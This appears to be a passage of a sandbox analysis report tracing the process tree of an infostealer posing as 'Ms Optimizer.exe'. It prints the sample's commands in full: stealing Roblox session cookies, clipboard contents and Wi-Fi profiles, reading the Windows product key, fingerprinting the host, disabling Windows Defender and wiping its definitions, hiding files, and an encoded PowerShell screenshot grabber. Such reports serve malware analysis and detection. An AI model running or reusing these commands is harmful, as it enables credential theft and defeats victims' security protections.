                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                4⤵
                                                                  PID:4708
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    5⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:3956
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                  4⤵
                                                                    PID:636
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                      5⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4036
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                                    4⤵
                                                                      PID:5092
                                                                      • C:\Windows\system32\getmac.exe
                                                                        getmac
                                                                        5⤵
                                                                          PID:2804
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48602\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\S45f8.zip" *"
                                                                        4⤵
                                                                          PID:3640
                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI48602\rar.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\_MEI48602\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\S45f8.zip" *
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            PID:1452
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                          4⤵
                                                                            PID:4232
                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic os get Caption
                                                                              5⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:4676
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                            4⤵
                                                                              PID:4028
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic computersystem get totalphysicalmemory
                                                                                5⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                PID:1324
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                              4⤵
                                                                                PID:4784
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic csproduct get uuid
                                                                                  5⤵
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:2956
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                4⤵
                                                                                  PID:1560
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                    5⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3208
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                  4⤵
                                                                                    PID:1472
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic path win32_VideoController get name
                                                                                      5⤵
                                                                                      • Detects videocard installed
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:1080
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                    4⤵
                                                                                      PID:968
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                        5⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:1308
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\7zO89AC8608\Ms Optimizer.exe""
                                                                                      4⤵
                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                      PID:1620
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping localhost -n 3
                                                                                        5⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:2360
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zO89ABEA28\Ms Optimizer.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zO89ABEA28\Ms Optimizer.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2208
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zO89ABEA28\Ms Optimizer.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zO89ABEA28\Ms Optimizer.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:3032
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zO89AA7038\Ms Optimizer.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zO89AA7038\Ms Optimizer.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1740
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zO89AA7038\Ms Optimizer.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zO89AA7038\Ms Optimizer.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:1364
                                                                              • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
                                                                                C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
                                                                                1⤵
                                                                                • Drops file in Windows directory
                                                                                PID:4348
                                                                              • C:\Users\Admin\Desktop\Ms Optimizer.exe
                                                                                "C:\Users\Admin\Desktop\Ms Optimizer.exe"
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                PID:4072
                                                                                • C:\Users\Admin\Desktop\Ms Optimizer.exe
                                                                                  "C:\Users\Admin\Desktop\Ms Optimizer.exe"
                                                                                  2⤵
                                                                                  • Drops file in Drivers directory
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  PID:4716
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Ms Optimizer.exe'"
                                                                                    3⤵
                                                                                      PID:224
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Ms Optimizer.exe'
                                                                                        4⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4448
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                      3⤵
                                                                                        PID:232
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          PID:4080
                                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                          4⤵
                                                                                          • Deletes Windows Defender Definitions
                                                                                          PID:1972
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('REQUIREMENT NOT INSTALLED', 0, 'REQUIREMENT', 32+16);close()""
                                                                                        3⤵
                                                                                          PID:1836
                                                                                          • C:\Windows\system32\mshta.exe
                                                                                            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('REQUIREMENT NOT INSTALLED', 0, 'REQUIREMENT', 32+16);close()"
                                                                                            4⤵
                                                                                              PID:3800
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                            3⤵
                                                                                              PID:2948
                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                tasklist /FO LIST
                                                                                                4⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                PID:4168
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                              3⤵
                                                                                                PID:1172
                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                  wmic csproduct get uuid
                                                                                                  4⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:472
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                3⤵
                                                                                                  PID:2932
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                    4⤵
                                                                                                      PID:3996
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                    3⤵
                                                                                                      PID:780
                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                        4⤵
                                                                                                          PID:396
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                        3⤵
                                                                                                          PID:4692
                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                            wmic path win32_VideoController get name
                                                                                                            4⤵
                                                                                                            • Detects videocard installed
                                                                                                            PID:3752
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                          3⤵
                                                                                                            PID:4376
                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                              wmic path win32_VideoController get name
                                                                                                              4⤵
                                                                                                              • Detects videocard installed
                                                                                                              PID:4060
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\Ms Optimizer.exe""
                                                                                                            3⤵
                                                                                                            • Hide Artifacts: Hidden Files and Directories
                                                                                                            PID:3580
                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                              attrib +h +s "C:\Users\Admin\Desktop\Ms Optimizer.exe"
                                                                                                              4⤵
                                                                                                              • Views/modifies file attributes
                                                                                                              PID:2804
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  ‎ .scr'"
                                                                                                            3⤵
                                                                                                              PID:2016
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‍  ‎ .scr'
                                                                                                                4⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:3544
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                              3⤵
                                                                                                                PID:3712
                                                                                                                • C:\Windows\system32\tasklist.exe
                                                                                                                  tasklist /FO LIST
                                                                                                                  4⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  PID:1952
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                3⤵
                                                                                                                  PID:392
                                                                                                                  • C:\Windows\system32\tasklist.exe
                                                                                                                    tasklist /FO LIST
                                                                                                                    4⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    PID:4132
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                  3⤵
                                                                                                                    PID:4364
                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                      4⤵
                                                                                                                        PID:3580
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                      3⤵
                                                                                                                      • Clipboard Data
                                                                                                                      PID:2956
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell Get-Clipboard
                                                                                                                        4⤵
                                                                                                                        • Clipboard Data
                                                                                                                        PID:2696
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                      3⤵
                                                                                                                        PID:4856
                                                                                                                        • C:\Windows\system32\tasklist.exe
                                                                                                                          tasklist /FO LIST
                                                                                                                          4⤵
                                                                                                                          • Enumerates processes with tasklist
                                                                                                                          PID:4020
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                        3⤵
                                                                                                                          PID:1480
                                                                                                                          • C:\Windows\system32\tree.com
                                                                                                                            tree /A /F
                                                                                                                            4⤵
                                                                                                                              PID:400
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                            3⤵
                                                                                                                            • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                            PID:524
                                                                                                                            • C:\Windows\system32\netsh.exe
                                                                                                                              netsh wlan show profile
                                                                                                                              4⤵
                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                              • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                              PID:4108
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                            3⤵
                                                                                                                              PID:1708
                                                                                                                              • C:\Windows\system32\systeminfo.exe
                                                                                                                                systeminfo
                                                                                                                                4⤵
                                                                                                                                • Gathers system information
                                                                                                                                PID:2756
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                              3⤵
                                                                                                                                PID:5056
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                  4⤵
                                                                                                                                    PID:3120
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                  3⤵
                                                                                                                                    PID:3676
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAF